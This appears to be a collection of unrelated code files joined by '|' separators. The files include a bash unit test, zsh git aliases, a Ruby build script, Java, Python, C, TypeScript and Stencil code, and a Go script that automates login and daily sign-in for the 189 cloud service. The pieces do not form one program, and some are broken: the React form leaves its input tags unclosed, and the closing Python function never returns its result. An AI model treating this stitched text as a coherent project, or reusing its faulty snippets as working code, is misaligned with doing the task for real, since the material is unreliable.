failure="FALSE"
while getopts ${optionargs} name
do
case ${name} in
h)
echo -e ${USAGE}
exit 0
;;
v)
verbose_mode="TRUE"
;;
\?)
errecho "-e" "invalid option: -$OPTARG"
errecho "-e" ${USAGE}
exit 1
;;
esac
done
kbtable="/tmp/kbyte_table_$$.txt"
cat > ${kbtable} <<EOF
B 1
K 1000
M 1000000
G 1000000000
T 1000000000000
P 1000000000000000
E 1000000000000000000
Z 1000000000000000000000
EOF
kbibtable="/tmp/kbibyte_table_$$.txt"
cat > ${kbibtable} <<EOF2
BYT 1
KIB 1024
MIB 1048576
GIB 1073741824
TIB 1099511627776
PIB 1125899906842624
EIB 1152921504606846976
ZIB 1180591620717411303424
EOF2
while read -r suffix value
do
if [[ "$(nice2num 1${suffix})" != "${value}" ]]
then
failure="TRUE"
fi
if [[ "${verbose_mode}" == "TRUE" ]]
then
echo -e "${suffix}\t$(nice2num 1${suffix})"
fi
done < ${kbtable}
while read -r suffix value
do
if [[ "$(nice2num 1${suffix})" != "${value}" ]]
then
failure="TRUE"
fi
if [[ "${verbose_mode}" == "TRUE" ]]
then
echo -e "${suffix}\t$(nice2num 1${suffix})"
fi
done < ${kbibtable}
# Previously forgot to cleanup
rm -f ${kbtable} ${kbibtable}
if [[ "${failure}" == "TRUE" ]]
then
exit 1
else
exit 0
fi
|
#!/bin/bash
IP_ADDRESS=$(cat inventory | tail -n 1)
xdg-open http://$IP_ADDRESS:8080 >/dev/null
|
public static int sumOfNums(int maxNum){
int sum = 0;
for (int i=1; i <=maxNum; i++) {
sum += i;
}
return sum;
} |
alias pbcopy='xclip -selection clipboard'
alias pbpaste='xclip -selection clipboard -o'
alias ls='ls --color=always'
alias ll='ls -lh'
# ----------------------
# Git Aliases
# ----------------------
alias ga='git add'
alias gaa='git add --all'
alias gau='git add --update'
alias gb='git branch'
alias gbd='git branch --delete'
alias gc='git commit'
alias gcm='git commit --message'
alias gcf='git commit --fixup'
alias gco='git checkout'
alias gcob='git checkout -b'
alias gcom='git checkout master'
alias gcos='git checkout staging'
alias gcod='git checkout develop'
alias gd='git diff'
alias gda='git diff HEAD'
alias gi='git init'
alias glg='git log --graph --oneline --decorate --all'
alias gld='git log --pretty=format:"%h %ad %s" --date=short --all'
alias gm='git merge --no-ff'
alias gma='git merge --abort'
alias gmc='git merge --continue'
alias gp='git pull'
alias gpr='git pull --rebase'
alias gps='git push'
alias gpo='git push -u origin master'
alias gr='git rebase'
alias gs='git status'
alias gss='git status --short'
alias gst='git stash'
alias gsta='git stash apply'
alias gstd='git stash drop'
alias gstl='git stash list'
alias gstp='git stash pop'
alias gsts='git stash save'
alias gsma='git submodule add'
alias gsmu='git submodule update --init --recursive'
# ----------------------
# Git Functions
# ----------------------
# Git log find by commit message
function glf() { git log --all --grep="$1"; }
# 重载
alias reload="source $HOME/.zshrc"
# 自定义脚本
zy() {
local script=$zhiyuan/scripts/$1
if [[ -f $script ]]; then
$script ${@:2} # 丢掉第一个参数
else
echo "$script not found"
fi
}
# mkdir && cd
mk() {
mkdir -p $1 && cd $1
}
# ncdu
if has_cmd ncdu; then alias du="ncdu"; fi
# 防止不小心reboot
reboot() {
vared -p 'Reboot? [y/N]: ' -c _reboot
[[ $_reboot == 'y' ]] && /sbin/reboot
}
# 一次运行
one() {
nohup "$@" >/dev/null 2>&1 &
}
# texdoc nohup
if has_cmd texdoc; then
texdoc() {
one texdoc "$@"
}
fi
# note
alias note='vim $HOME/daily/note/$(cd $HOME/daily/note && fzf)'
# vim
cvim() {
if [[ $# -eq 0 ]]; then
if git rev-parse --show-toplevel 2> /dev/null; then
dir=$(git rev-parse --show-toplevel)
vim $(cd $dir && fzf)
else
vim $(fzf)
fi
elif [[ -f $1 ]]; then
vim $1
elif [[ -d $1 ]]; then
vim $(cd $1 && fzf)
else
vim "$@"
fi
}
# chmode
alias chm='sudo chmod +x'
# go to root
zr() {
if git rev-parse --show-toplevel 2> /dev/null; then
cd $(git rev-parse --show-toplevel)
fi
}
gcl() {
git clone --depth 1 "https://hub.fastgit.org/$1"
}
function gitzip() {
git archive -o $@.zip HEAD
}
|
#!/usr/bin/env ruby
#
# Fetch the HA data and configures the ios and android builds according to the provided HA.
#
# Usage
#
# bin/set_ha <health-authority-label>
#
# Example
#
# bin/set_ha pc
#
# Requirements
#
# 1. Remote access to the environment repo
# 2. A github personal access token saved in `.env`:
# https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token
require 'open3'
require 'dotenv'
require_relative "./download_copy_methods"
require_relative "./download_links_methods"
require_relative "./download_brand_colors_methods"
require_relative "./fetch_configurable_images_methods"
Dotenv.load
HA_LABEL = ARGV[0]
ACCESS_TOKEN = ARGV[1] || ENV.fetch("ACCESS_TOKEN")
if (ACCESS_TOKEN) then
fetching_env_succeeded = system("./bin/fetch_ha_env.sh #{HA_LABEL} #{ACCESS_TOKEN}")
else
raise "Empty github access token"
end
def download_all_assets
system("./bin/download_assets.sh #{HA_LABEL} #{ACCESS_TOKEN}")
download_copy_file(HA_LABEL, ACCESS_TOKEN)
download_links_file(HA_LABEL, ACCESS_TOKEN)
download_brand_colors_file(HA_LABEL, ACCESS_TOKEN)
fetch_configurable_images(HA_LABEL, ACCESS_TOKEN)
true
end
if fetching_env_succeeded && system("./bin/configure_builds.sh") &&
download_all_assets
exit 0
else
exit 1
end
|
import java.util.Base64;
public class Main {
public static void main(String[] args) {
byte[] data = {1, 2, 3, 4, 5};
String encodedData = Base64.getEncoder().encodeToString(data);
System.out.println(encodedData);
// Prints AQIDBAU=
}
} |
mem = list(map(int, input().split(" ")))
mem.sort()
tri = (mem[0] + mem[1] > mem[2] or mem[1] + mem[2] > mem[3])
seg = (mem[0] + mem[1] == mem[2] or mem[0] + mem[1] == mem[3] or mem[1] + mem[2] == mem[3])
if tri:
print("TRIANGLE")
elif seg:
print("SEGMENT")
else:
print("IMPOSSIBLE")
|
<filename>src/interpreter/ast/Expression.java<gh_stars>0
package interpreter.ast;
/**
* Created by Thomas on 2-3-2015.
*/
public abstract class Expression extends Node {
public Expression(int lineIndex, int columnIndex) {
super(lineIndex, columnIndex);
}
}
|
<filename>spec/models/qernel/slot_spec.rb
require 'spec_helper'
module Qernel
describe Slot do
before :all do
NastyCache.instance.expire!
Etsource::Base.loader('spec/fixtures/etsource')
end
describe '.factory' do
let(:node) { FactoryBot.build(:node) }
context 'when type=nil' do
it 'should be an ordinary slot' do
slot = Qernel::Slot.factory(
nil, 1, node,
Qernel::Carrier.new(key: :electricity), :output)
expect(slot).to be_a(Qernel::Slot)
expect(slot).not_to be_a(Qernel::Slot::Elastic)
end
end
context 'when type=invalid' do
it 'should be an ordinary slot' do
slot = Qernel::Slot.factory(:invalid,
1, node, Qernel::Carrier.new(key: :loss), :input)
expect(slot).to be_a(Qernel::Slot)
expect(slot).not_to be_a(Qernel::Slot::Elastic)
end
end
context 'when type=elastic' do
it 'should be an elastic slot' do
slot = Qernel::Slot.factory(:elastic,
1, node, Qernel::Carrier.new(key: :loss), :output)
expect(slot).to be_a(Qernel::Slot::Elastic)
end
end
end
end
end
|
<gh_stars>0
/*
* Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The OpenAirInterface Software Alliance licenses this file to You under
* the Apache License, Version 2.0 (the "License"); you may not use this file
* except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*-------------------------------------------------------------------------------
* For more information about the OpenAirInterface (OAI) Software Alliance:
* <EMAIL>
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <nettle/nettle-meta.h>
#include <nettle/aes.h>
#include <nettle/ctr.h>
#include "assertions.h"
#include "conversions.h"
#include "secu_defs.h"
#include "snow3g.h"
#include "dynamic_memory_check.h"
int
nas_stream_encrypt_eea1 (
nas_stream_cipher_t * const stream_cipher,
uint8_t * const out)
{
snow_3g_context_t snow_3g_context;
int n;
int i = 0;
uint32_t zero_bit = 0;
//uint32_t byte_length;
uint32_t *KS;
uint32_t K[4],
IV[4];
DevAssert (stream_cipher != NULL);
DevAssert (stream_cipher->key != NULL);
DevAssert (stream_cipher->key_length == 16);
DevAssert (out != NULL);
n = (stream_cipher->blength + 31) / 32;
zero_bit = stream_cipher->blength & 0x7;
//byte_length = stream_cipher->blength >> 3;
memset (&snow_3g_context, 0, sizeof (snow_3g_context));
/*
* Initialisation
*/
/*
* Load the confidentiality key for SNOW 3G initialization as in section
* 3.4.
*/
memcpy (K + 3, stream_cipher->key + 0, 4); /*K[3] = key[0]; we assume
* K[3]=key[0]||key[1]||...||key[31] , with key[0] the
* * * * most important bit of key */
memcpy (K + 2, stream_cipher->key + 4, 4); /*K[2] = key[1]; */
memcpy (K + 1, stream_cipher->key + 8, 4); /*K[1] = key[2]; */
memcpy (K + 0, stream_cipher->key + 12, 4); /*K[0] = key[3]; we assume
* K[0]=key[96]||key[97]||...||key[127] , with key[127] the
* * * * least important bit of key */
K[3] = hton_int32 (K[3]);
K[2] = hton_int32 (K[2]);
K[1] = hton_int32 (K[1]);
K[0] = hton_int32 (K[0]);
/*
* Prepare the initialization vector (IV) for SNOW 3G initialization as in
* section 3.4.
*/
IV[3] = stream_cipher->count;
IV[2] = ((((uint32_t) stream_cipher->bearer) << 3) | ((((uint32_t) stream_cipher->direction) & 0x1) << 2)) << 24;
IV[1] = IV[3];
IV[0] = IV[2];
/*
* Run SNOW 3G algorithm to generate sequence of key stream bits KS
*/
snow3g_initialize (K, IV, &snow_3g_context);
KS = (uint32_t *) malloc (4 * n);
snow3g_generate_key_stream (n, (uint32_t *) KS, &snow_3g_context);
if (zero_bit > 0) {
KS[n - 1] = KS[n - 1] & (uint32_t) (0xFFFFFFFF << (8 - zero_bit));
}
for (i = 0; i < n; i++) {
KS[i] = hton_int32 (KS[i]);
}
/*
* Exclusive-OR the input data with keystream to generate the output bit
* stream
*/
for (i = 0; i < n * 4; i++) {
stream_cipher->message[i] ^= *(((uint8_t *) KS) + i);
}
int ceil_index = 0;
if (zero_bit > 0) {
ceil_index = (stream_cipher->blength + 7) >> 3;
stream_cipher->message[ceil_index - 1] = stream_cipher->message[ceil_index - 1] & (uint8_t) (0xFF << (8 - zero_bit));
}
free_wrapper (KS);
memcpy (out, stream_cipher->message, n * 4);
if (zero_bit > 0) {
out[ceil_index - 1] = stream_cipher->message[ceil_index - 1];
}
return 0;
}
|
<gh_stars>10-100
import { DateConverter } from '../date-converter.component';
import { Injectable } from '@nestjs/common';
import { LogInterface } from '../../persistence/interface/log.interface';
import { LogTypeInterface } from '../type/log-type.interface';
@Injectable()
export class LogModelToTypeMapper {
constructor(private readonly dateConverter: DateConverter) {}
mapOne(log: LogInterface): LogTypeInterface {
return {
id: log._id.toString(),
message: log.message,
timestamp: this.dateConverter.convertDate(log.timestamp),
} as LogTypeInterface;
}
mapMany(logs: LogInterface[]): LogTypeInterface[] {
return logs.map(
(log: LogInterface): LogTypeInterface => {
return this.mapOne(log);
},
);
}
}
|
<filename>apps/evpnopenflow/src/main/java/org/onosproject/evpnopenflow/rsc/vpnport/VpnPortService.java<gh_stars>1-10
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.evpnopenflow.rsc.vpnport;
import com.fasterxml.jackson.databind.JsonNode;
import org.onosproject.evpnopenflow.rsc.VpnPort;
import org.onosproject.evpnopenflow.rsc.VpnPortId;
import java.util.Collection;
/**
* Service for interacting with the inventory of VPN port.
*/
public interface VpnPortService {
/**
* Returns if the vpnPort is existed.
*
* @param vpnPortId vpnPort identifier
* @return true or false if one with the given identifier is not existed.
*/
boolean exists(VpnPortId vpnPortId);
/**
* Returns the vpnPort with the identifier.
*
* @param vpnPortId vpnPort ID
* @return VpnPort or null if one with the given ID is not know.
*/
VpnPort getPort(VpnPortId vpnPortId);
/**
* Returns the collection of the currently known vpnPort.
*
* @return collection of VpnPort.
*/
Collection<VpnPort> getPorts();
/**
* Creates vpnPorts by vpnPorts.
*
* @param vpnPorts the iterable collection of vpnPorts
* @return true if all given identifiers created successfully.
*/
boolean createPorts(Iterable<VpnPort> vpnPorts);
/**
* Updates vpnPorts by vpnPorts.
*
* @param vpnPorts the iterable collection of vpnPorts
* @return true if all given identifiers updated successfully.
*/
boolean updatePorts(Iterable<VpnPort> vpnPorts);
/**
* Deletes vpnPortIds by vpnPortIds.
*
* @param vpnPortIds the iterable collection of vpnPort identifiers
* @return true or false if one with the given identifier to delete is
* successfully.
*/
boolean removePorts(Iterable<VpnPortId> vpnPortIds);
/**
* process gluon config for vpn port information.
*
* @param action can be either update or delete
* @param key can contain the id and also target information
* @param value content of the vpn port configuration
*/
void processGluonConfig(String action, String key, JsonNode value);
/**
* Adds the specified listener to Vpn Port manager.
*
* @param listener Vpn Port listener
*/
void addListener(VpnPortListener listener);
/**
* Removes the specified listener to Vpn Port manager.
*
* @param listener Vpn Port listener
*/
void removeListener(VpnPortListener listener);
}
|
#!/bin/bash
PROJECT_DIR="${PROJECT_DIR:-`cd "$(dirname $0)/..";pwd`}"
SWIFTLINT="${PROJECT_DIR}/.build/swiftlint/swiftlint"
CONFIG="${PROJECT_DIR}/.swiftlint.yml"
if [ $CI ]; then
REPORTER="--reporter github-actions-logging"
else
REPORTER=
fi
# possible paths
paths_swiftgen_sources="Sources/SwiftGen"
paths_swiftgen_tests="Tests/SwiftGenTests"
paths_swiftgencli_sources="Sources/SwiftGenCLI"
paths_swiftgenkit_sources="Sources/SwiftGenKit"
paths_swiftgenkit_tests="Tests/SwiftGenKitTests"
paths_templates_tests="Tests/TemplatesTests"
paths_templates_generated="Sources/TestUtils/Fixtures/Generated"
paths_testutils_sources="Sources/TestUtils"
# load selected group
if [ $# -gt 0 ]; then
key="$1"
else
echo "error: need group to lint."
exit 1
fi
selected_path=`eval echo '$'paths_$key`
if [ -z "$selected_path" ]; then
echo "error: need a valid group to lint."
exit 1
fi
# temporary work directory
scratch=`mktemp -d -t SwiftGen`
function finish {
rm -rf "$scratch"
}
trap finish EXIT
# actually run swiftlint
if [ "$key" = "templates_generated" ]; then
# copy the generated output to a temp dir and strip the "swiftlint:disable:all"
for f in `find "${PROJECT_DIR}/${selected_path}" -name '*.swift'`; do
temp_file="${scratch}${f#"$PROJECT_DIR"}"
mkdir -p $(dirname "$temp_file")
sed "s/swiftlint:disable all/ --/" "$f" > "$temp_file"
done
"$SWIFTLINT" lint --strict --config "$CONFIG" --path "$scratch" $REPORTER | sed s@"$scratch"@"${PROJECT_DIR}"@
exit ${PIPESTATUS[0]}
else
"$SWIFTLINT" lint --strict --config "$CONFIG" --path "${PROJECT_DIR}/${selected_path}" $REPORTER
fi
|
#!/bin/bash
set -e
echo "Testing if workbench is installed in editable mode"
ls /opt/conda/lib/python3.7/site-packages/workbench.egg-link
./wait-for-it.sh $1:$2 -t $3 -- \
echo "Running pytest as $USER with uid $UID" && \
pytest -vv "$(pwd)/docker"
|
import React from 'react';
const FormComponent = () => (
<form>
<label>
First name:
<input type="text" name="firstName">
</label>
<label>
Last name:
<input type="text" name="lastName">
</label>
<label>
Email:
<input type="email" name="email">
</label>
<input type="submit" value="Submit">
</form>
);
export default FormComponent; |
#!/bin/bash
# See docs/release-payload.md for more information
# A namespace and imagestream where the release will be published to
RELEASE_NAMESPACE=kni
RELEASE_STREAM=release
# A kubeconfig for api.ci.openshift.org
RELEASE_KUBECONFIG=release-kubeconfig
# Need access to wherever the payload image - and the
# images referenced by the payload - are hosted
RELEASE_PULLSECRET=release-pullsecret
# The imagestream in $RELEASE_NAMESPACE where kni-installer will be
# published to
INSTALLER_STREAM=installer
# The git repository and ref (e.g. branch) to build kni-installer from
INSTALLER_GIT_URI=https://github.com/openshift-metalkube/kni-installer.git
INSTALLER_GIT_REF=master
|
import React from "react";
import { Container, Button } from "shards-react";
import opnidashboard from '../images/p1.png'
const QuickStart = () => (
<Container fluid className="main-content-container px-4 pb-4">
<div className="error">
<div className="error__content">
<h2>Opni Demo Quickstart</h2>
<h3>Launch our demo with sockshop application on a single node cluster</h3>
<Button pill>Launch Demo</Button>
<p> </p>
<img src={opnidashboard} alt="Opni Dashboard" width="960" height="540" />
</div>
</div>
</Container>
);
export default QuickStart; |
//require module
//
const TCA9548A = require('./tca9548a');
//module is constructed via Class so first call a new instance
//device is automatically initialized and ready to use
//addr defaults to 0x70 and bus defaults to 1
//
const tca9548a_1 = new TCA9548A({addr: 0x70, bus: 1});
//if you have more than one TCA9548A, can call another instance
//make sure that the addr is correct!!!
//
const tca9548a_2 = new TCA9548A({addr: 0x71, bus: 1});
//as an example, if using two bme280 temp sensors (sensor1 and sensor2) that have the same address
//need to enable the specific multiplexer port each time you want to read from a certain device
//singlePortOn activates the port number of the argument and disables the other ports
//argument has to be a number 0-7
//
//use a callback to ensure that the port is enabled before proceeding with other processing
//
//for example, sensor1 is attached to port 2 on the multiplexer
//
tca9548a_1.singlePortOn(2, doSomethingWithSensor());
//then you want to read from sensor2 attached to port 6 on the multiplexer
//
tca9548a_1.singlePortOn(6, doSomethingWithSensor());
function doSomethingWithSensor () {
//process sensor data magic
console.log('doSomethingWithSensor called');
}
//can also enable all ports
tca9548a_1.allPortsOn();
//or disable all ports
tca9548a_1.allPortsOff();
|
package cloud189
import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"encoding/hex"
"encoding/pem"
"fmt"
"log"
"regexp"
"strconv"
"time"
"github.com/buger/jsonparser"
"github.com/go-resty/resty/v2"
)
func sign(client *resty.Client) int {
rand := strconv.FormatInt(time.Now().UnixNano()/1e6, 10)
url := "https://api.cloud.189.cn/mkt/userSign.action?rand=" + rand + "&clientType=TELEANDROID&version=8.6.3&model=SM-G930K"
headers := map[string]string{
"Referer": "https://m.cloud.189.cn/zhuanti/2016/sign/index.jsp?albumBackupOpened=1",
"Host": "m.cloud.189.cn",
"Accept-Encoding": "gzip, deflate",
}
resp, err := client.R().SetHeaders(headers).Get(url)
if err != nil {
log.Println(err)
return 0
}
netdiskBonus, err := jsonparser.GetInt(resp.Body(), "netdiskBonus")
if err != nil {
log.Println(err)
return 0
}
return int(netdiskBonus)
}
func login(client *resty.Client, username, password string) bool {
url := "https://cloud.189.cn/udb/udb_login.jsp?pageId=1&redirectURL=/main.action"
resp, err := client.R().Get(url)
if err != nil {
log.Println(err)
return false
}
ctx := resp.String()
captchaToken := regexpString(`captchaToken' value='(.+?)'`, ctx)
lt := regexpString(`var lt = "(.+?)";`, ctx)
returnUrl := regexpString(`returnUrl = '(.+?)',`, ctx)
paramId := regexpString(`var paramId = "(.+?)";`, ctx)
jRsaKey := regexpString(`id="j_rsaKey" value="(.+?)"`, ctx)
key := "-----BEGIN PUBLIC KEY-----\n" + jRsaKey + "\n-----END PUBLIC KEY-----"
url = "https://open.e.189.cn/api/logbox/oauth2/loginSubmit.do"
headers := map[string]string{
"lt": lt,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/76.0",
"Referer": "https://open.e.189.cn/",
}
data := map[string]string{
"appKey": "cloud",
"accountType": "01",
"userName": "{RSA}" + rsaEncrypt(username, key),
"password": "{RSA}" + rsaEncrypt(password, key),
"validateCode": "",
"captchaToken": captchaToken,
"returnUrl": returnUrl,
"mailSuffix": "@189.cn",
"paramId": paramId,
"dynamicCheck": "FALSE",
"clientType": "10010",
"cb_SaveName": "1",
"isOauth2": "false",
}
resp, err = client.R().SetHeaders(headers).SetFormData(data).Post(url)
if err != nil {
log.Println(err)
return false
}
msg, err := jsonparser.GetString(resp.Body(), "msg")
if err != nil && msg != "登录成功" {
log.Println(err, msg)
return false
}
url, err = jsonparser.GetString(resp.Body(), "toUrl")
if err != nil {
log.Println(err)
return false
}
client.R().Get(url)
return true
}
// Do 执行
func Do(username, password string) string {
client := resty.New()
headers := map[string]string{
"User-Agent": "Mozilla/5.0 (Linux; Android 5.1.1; SM-G930K Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 Ecloud/8.6.3 Android/22 clientId/355325117317828 clientModel/SM-G930K imsi/460071114317824 clientChannelId/qq proVersion/1.0.6",
}
client.SetHeaders(headers)
if !login(client, username, password) {
return "登录失败"
}
// 签到
netdiskBonus := sign(client)
return fmt.Sprintf("本次签到获得%dM空间", netdiskBonus)
}
func regexpString(reg, ctx string) string {
r := regexp.MustCompile(reg)
out := r.FindStringSubmatch(ctx)
if len(out) != 2 {
return ""
}
return out[1]
}
// rsaEncrypt 公钥加密
func rsaEncrypt(in, key string) string {
//解密pem格式的公钥
block, _ := pem.Decode([]byte(key))
if block == nil {
return ""
}
// 解析公钥
pubInterface, err := x509.ParsePKIXPublicKey(block.Bytes)
if err != nil {
log.Println(err)
return ""
}
// 类型断言
pub := pubInterface.(*rsa.PublicKey)
//加密
ciphertext, err := rsa.EncryptPKCS1v15(rand.Reader, pub, []byte(in))
if err != nil {
log.Println(err)
return ""
}
return hex.EncodeToString(ciphertext)
}
|
<reponame>lettucebowler/stencildoku<filename>src/components.d.ts
/* eslint-disable */
/* tslint:disable */
/**
* This is an autogenerated file created by the Stencil compiler.
* It contains typing information for all components that exist in this project.
*/
import { HTMLStencilElement, JSXBase } from "@stencil/core/internal";
export namespace Components {
interface AppRoot {
}
interface LettuceButton {
"fluid": boolean;
"newGame": boolean;
"sizeSelection": string | 'sm' | 'md' | 'lg';
"square": boolean;
"text": string;
"type": string;
}
interface LettuceModal {
}
interface LettucePageContentContainer {
}
interface LettuceSpacingVertical {
"sizeSelection": string;
}
interface LettuceSudokuBoard {
"currentBoard": string;
"initialBoard": string;
"order": number;
"selectedCol": number;
"selectedRow": number;
}
interface LettuceSudokuCell {
"col": number;
"number": number;
"numberStatus": string;
"row": number;
"selectionState": string;
"type": string;
}
interface LettuceSudokuGame {
"order": number;
}
interface LettuceSudokuMoveButtons {
"order": number;
}
}
declare global {
interface HTMLAppRootElement extends Components.AppRoot, HTMLStencilElement {
}
var HTMLAppRootElement: {
prototype: HTMLAppRootElement;
new (): HTMLAppRootElement;
};
interface HTMLLettuceButtonElement extends Components.LettuceButton, HTMLStencilElement {
}
var HTMLLettuceButtonElement: {
prototype: HTMLLettuceButtonElement;
new (): HTMLLettuceButtonElement;
};
interface HTMLLettuceModalElement extends Components.LettuceModal, HTMLStencilElement {
}
var HTMLLettuceModalElement: {
prototype: HTMLLettuceModalElement;
new (): HTMLLettuceModalElement;
};
interface HTMLLettucePageContentContainerElement extends Components.LettucePageContentContainer, HTMLStencilElement {
}
var HTMLLettucePageContentContainerElement: {
prototype: HTMLLettucePageContentContainerElement;
new (): HTMLLettucePageContentContainerElement;
};
interface HTMLLettuceSpacingVerticalElement extends Components.LettuceSpacingVertical, HTMLStencilElement {
}
var HTMLLettuceSpacingVerticalElement: {
prototype: HTMLLettuceSpacingVerticalElement;
new (): HTMLLettuceSpacingVerticalElement;
};
interface HTMLLettuceSudokuBoardElement extends Components.LettuceSudokuBoard, HTMLStencilElement {
}
var HTMLLettuceSudokuBoardElement: {
prototype: HTMLLettuceSudokuBoardElement;
new (): HTMLLettuceSudokuBoardElement;
};
interface HTMLLettuceSudokuCellElement extends Components.LettuceSudokuCell, HTMLStencilElement {
}
var HTMLLettuceSudokuCellElement: {
prototype: HTMLLettuceSudokuCellElement;
new (): HTMLLettuceSudokuCellElement;
};
interface HTMLLettuceSudokuGameElement extends Components.LettuceSudokuGame, HTMLStencilElement {
}
var HTMLLettuceSudokuGameElement: {
prototype: HTMLLettuceSudokuGameElement;
new (): HTMLLettuceSudokuGameElement;
};
interface HTMLLettuceSudokuMoveButtonsElement extends Components.LettuceSudokuMoveButtons, HTMLStencilElement {
}
var HTMLLettuceSudokuMoveButtonsElement: {
prototype: HTMLLettuceSudokuMoveButtonsElement;
new (): HTMLLettuceSudokuMoveButtonsElement;
};
interface HTMLElementTagNameMap {
"app-root": HTMLAppRootElement;
"lettuce-button": HTMLLettuceButtonElement;
"lettuce-modal": HTMLLettuceModalElement;
"lettuce-page-content-container": HTMLLettucePageContentContainerElement;
"lettuce-spacing-vertical": HTMLLettuceSpacingVerticalElement;
"lettuce-sudoku-board": HTMLLettuceSudokuBoardElement;
"lettuce-sudoku-cell": HTMLLettuceSudokuCellElement;
"lettuce-sudoku-game": HTMLLettuceSudokuGameElement;
"lettuce-sudoku-move-buttons": HTMLLettuceSudokuMoveButtonsElement;
}
}
declare namespace LocalJSX {
interface AppRoot {
}
interface LettuceButton {
"fluid"?: boolean;
"newGame"?: boolean;
"sizeSelection"?: string | 'sm' | 'md' | 'lg';
"square"?: boolean;
"text"?: string;
"type"?: string;
}
interface LettuceModal {
"onGenerateBoard"?: (event: CustomEvent<string>) => void;
}
interface LettucePageContentContainer {
}
interface LettuceSpacingVertical {
"sizeSelection"?: string;
}
interface LettuceSudokuBoard {
"currentBoard"?: string;
"initialBoard"?: string;
"order"?: number;
"selectedCol"?: number;
"selectedRow"?: number;
}
interface LettuceSudokuCell {
"col"?: number;
"number"?: number;
"numberStatus"?: string;
"onCellSelected"?: (event: CustomEvent<any>) => void;
"row"?: number;
"selectionState"?: string;
"type"?: string;
}
interface LettuceSudokuGame {
"onMoveEvent"?: (event: CustomEvent<any>) => void;
"onNewGameEvent"?: (event: CustomEvent<any>) => void;
"order"?: number;
}
interface LettuceSudokuMoveButtons {
"onMoveEvent"?: (event: CustomEvent<any>) => void;
"order"?: number;
}
interface IntrinsicElements {
"app-root": AppRoot;
"lettuce-button": LettuceButton;
"lettuce-modal": LettuceModal;
"lettuce-page-content-container": LettucePageContentContainer;
"lettuce-spacing-vertical": LettuceSpacingVertical;
"lettuce-sudoku-board": LettuceSudokuBoard;
"lettuce-sudoku-cell": LettuceSudokuCell;
"lettuce-sudoku-game": LettuceSudokuGame;
"lettuce-sudoku-move-buttons": LettuceSudokuMoveButtons;
}
}
export { LocalJSX as JSX };
declare module "@stencil/core" {
export namespace JSX {
interface IntrinsicElements {
"app-root": LocalJSX.AppRoot & JSXBase.HTMLAttributes<HTMLAppRootElement>;
"lettuce-button": LocalJSX.LettuceButton & JSXBase.HTMLAttributes<HTMLLettuceButtonElement>;
"lettuce-modal": LocalJSX.LettuceModal & JSXBase.HTMLAttributes<HTMLLettuceModalElement>;
"lettuce-page-content-container": LocalJSX.LettucePageContentContainer & JSXBase.HTMLAttributes<HTMLLettucePageContentContainerElement>;
"lettuce-spacing-vertical": LocalJSX.LettuceSpacingVertical & JSXBase.HTMLAttributes<HTMLLettuceSpacingVerticalElement>;
"lettuce-sudoku-board": LocalJSX.LettuceSudokuBoard & JSXBase.HTMLAttributes<HTMLLettuceSudokuBoardElement>;
"lettuce-sudoku-cell": LocalJSX.LettuceSudokuCell & JSXBase.HTMLAttributes<HTMLLettuceSudokuCellElement>;
"lettuce-sudoku-game": LocalJSX.LettuceSudokuGame & JSXBase.HTMLAttributes<HTMLLettuceSudokuGameElement>;
"lettuce-sudoku-move-buttons": LocalJSX.LettuceSudokuMoveButtons & JSXBase.HTMLAttributes<HTMLLettuceSudokuMoveButtonsElement>;
}
}
}
|
package cn.ben.tvdemo.util;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.Calendar;
import java.util.Date;
import java.util.Locale;
@SuppressWarnings("SameParameterValue")
public class TimeUtil {
public static final String FORMAT_YEAR_MONTH_DAY = "yyyy-MM-dd";
public static final String FORMAT_YEAR_MONTH_DAY_HOUR_MINUTE = "yyyy-MM-dd HH:mm";
private static final Calendar mCalendar = Calendar.getInstance();
private TimeUtil() {
}
public static String plusOnDate(String date, int inc, String inputFormat, String outputFormat) {
mCalendar.setTime(string2Date(date, inputFormat));
mCalendar.add(Calendar.DATE, inc);
return date2String(mCalendar.getTime(), outputFormat);
}
public static String plusOnCurrentDate(int inc, String outputFormat) {
mCalendar.setTime(new Date());
mCalendar.add(Calendar.DATE, inc);
return date2String(mCalendar.getTime(), outputFormat);
}
public static Date plusOnCurrentDate(int inc) {
mCalendar.setTime(new Date());
mCalendar.add(Calendar.DATE, inc);
return mCalendar.getTime();
}
public static String date2String(Date date, String format) {
SimpleDateFormat sdf = new SimpleDateFormat(format, Locale.getDefault());
return sdf.format(date);
}
public static Date string2Date(String dateStr, String format) {
SimpleDateFormat sdf = new SimpleDateFormat(format, Locale.getDefault());
try {
return sdf.parse(dateStr);
} catch (ParseException e) {
e.printStackTrace();
}
return null;
}
public static boolean areSameDay(Date dateA, Date dateB) {
Calendar calDateA = Calendar.getInstance();
calDateA.setTime(dateA);
Calendar calDateB = Calendar.getInstance();
calDateB.setTime(dateB);
return calDateA.get(Calendar.YEAR) == calDateB.get(Calendar.YEAR)
&& calDateA.get(Calendar.MONTH) == calDateB.get(Calendar.MONTH)
&& calDateA.get(Calendar.DAY_OF_MONTH) == calDateB.get(Calendar.DAY_OF_MONTH);
}
}
|
from typing import List
def transform_list(nums: List[int]) -> List[int]:
transformed_nums = []
for num in nums:
if num % 2 == 0: # If the integer is even
transformed_nums.append(num // 2)
else: # If the integer is odd
transformed_nums.append((num * 3) + 1)
